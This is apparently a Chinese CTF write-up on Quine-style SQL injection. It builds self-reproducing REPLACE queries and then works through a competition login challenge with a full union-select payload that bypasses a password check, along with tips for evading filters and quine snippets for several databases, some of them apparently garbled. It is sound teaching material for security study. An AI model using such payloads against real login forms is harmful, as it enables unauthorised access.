- 前言
这两天在HDCTF遇到了Quine注入的考点,刚开始接触CTF的时候也在记不清哪个新生赛遇到了,这里记录一下
Quine是什么
quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。标准术语是自产生程序,能够直接读取自己源码、读入用户输入或空白的程序一般都不视为自产生程序。纪念美国哲学家奎恩(Willard Van Orman Quine)而命名
通常,用于在任何编程语言中创建一个自产生程序(Quine)在程序中具有两部分,一是用于执行实际打印的代码,二是表示代码文本形式的数据。
这里给出几个python3的Quine示例
代码语言:javascript复制a = 'a = {}{}{}; print(a.format(chr(39), a, chr(39)))'; print(a.format(chr(39), a, chr(39)))
chr(39)
是单引号('
)
c = 'c = %r; print(c %% c)'; print(c % c)
%r
是一个万能的格式付,它会将后面给的参数原样打印出来,带有类型信息
exec(s:='print("exec(s:=%r)"%s)')
一些编程语言可以将字符串当作程序运行,Quine可以利用这个特点。Python、Ruby、Lua都可以
构造Quine
而在sql
注入技术中,这是一种使得输入的sql
语句和输出的sql
语句一致的技术,常用于一些特殊的登陆绕过sql
注入中
replace()函数 replace(object,search,replace) 把object对象中出现的search全部替换成replace
Quine的基本形式就是
代码语言:javascript复制REPLACE(str,编码的间隔符,str)
参数str的形式为
代码语言:javascript复制REPLACE(间隔符,编码的间隔符,间隔符)
这样运算的结果形式又变成了REPLACE(str,编码的间隔符,str)
例如间隔符为”.
“,编码间隔符为CHAR(46)
,这样str就是
select REPLACE(".",CHAR(46),".");
---------------------------
| replace(".",char(46),".") |
---------------------------
| . |
---------------------------
构造出来的结果就是
代码语言:javascript复制select REPLACE('REPLACE(".",CHAR(46),".")',CHAR(46),'REPLACE(".",CHAR(46),".")');
---------------------------------------------------------------------------
| replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")') |
---------------------------------------------------------------------------
| replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") |
---------------------------------------------------------------------------
但仔细观察可以发现还没有完全实现一致,在单双引号还存在细微区别。
在刚刚构造的Quine中
代码语言:javascript复制Quine: REPLACE('str',编码的间隔符,'str')
str: REPLACE("间隔符",编码的间隔符,"间隔符")
这里str
中的间隔符使用双引号的原因是,str
已经被单引号包裹,为避免引号匹配问题引入新的转义符号,间隔符需要使用双引号
运算后的结果是REPLACE("str",编码的间隔符,"str")
,所以让结果的str也用单引号包裹就能让输入和查询结果完全一致了
这时候就需要使用REPLACE
将str
的双引号换成单引号,这样最后就不会出现引号不一致的情况了
升级版Quine的基本形式,CHAR(34)
是双引号,CHAR(39)
是单引号
REPLACE(REPLACE('str',CHAR(34),CHAR(39)),编码的间隔符,'str')
升级版str的基本形式
代码语言:javascript复制REPLACE(REPLACE("间隔符",CHAR(34),CHAR(39)),编码的间隔符,"间隔符")
先将str里的双引号替换成单引号,再用str替换str里的间隔符
那么结果就是
代码语言:javascript复制select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');
------------------------------------------------------------------------------------------------------------------------------------------------------------
| replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
------------------------------------------------------------------------------------------------------------------------------------------------------------
| replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
------------------------------------------------------------------------------------------------------------------------------------------------------------
实例解析
例题来源:第五空间智能安全大赛-Web-yet_another_mysql_injection
代码语言:javascript复制$password=$_POST['password'];
if ($username !== 'admin') {
alertMes('only admin can login', 'index.php');
}
checkSql($password);
$sql="SELECT password FROM users WHERE username='admin' and password='$password';";
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes("something wrong",'index.php');
}
if ($row['password'] === $password) {
die($FLAG);
}
这是一部分源码,这段代码逻辑要求username
必须为admin
,密码需要与查询到的password
一致,才能拿到flag
通过盲注可以发现数据库里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine
这里我们就来分析一手payload
代码语言:javascript复制1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
其中1'/**/union/**/select/**/replace(replace('',char(34),char(39)),char(46),'')#
是Quine的基本形式
而1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#
是str的基本形式
这样嵌套起来多次替换就达到了输入输出的相同的目的
如果char被过滤了,可以使用chr
和0x
绕过
char(34),char(39)
chr(34),chr(39)
0x22,0x27
其他数据库的Quine
SQL Server
代码语言:javascript复制SELECT Replace(Replace(
'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',
Char(34), Char(39)), Char(36),
'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine')
AS Quine
DECLARE @ CHAR(65)='DECLARE @ CHAR(65)=#PRINT REPLACE(@,CHAR(35),CHAR(39) @ CHAR(39))'PRINT REPLACE(@,CHAR(35),CHAR(39) @ CHAR(39))
Oracle
代码语言:javascript复制SELECT Replace(Replace(
'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',
Char(34), Char(39)), Char(36),
'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine')
AS Quine
select
substr(rpad(1,125,'||chr(39)),26)from dual;select
substr(rpad(1,125,'||chr(39)),26)from dual;
PostgreSQL
代码语言:javascript复制SELECT left(A.v, 81) || chr(39) || A.v || chr(39) || right(A.v, 12) FROM (SELECT 'SELECT left(A.v, 81) || chr(39) || A.v || chr(39) || right(A.v, 12) FROM (SELECT AS v) AS A;' AS v) AS A;
Snowflake
代码语言:javascript复制SELECT CURRENT_STATEMENT();
参考链接: 从三道赛题再谈Quine trick | ch3ns1r https://stackoverflow.com/questions/4006189/quine-self-producing-sql-query 维基百科 Quine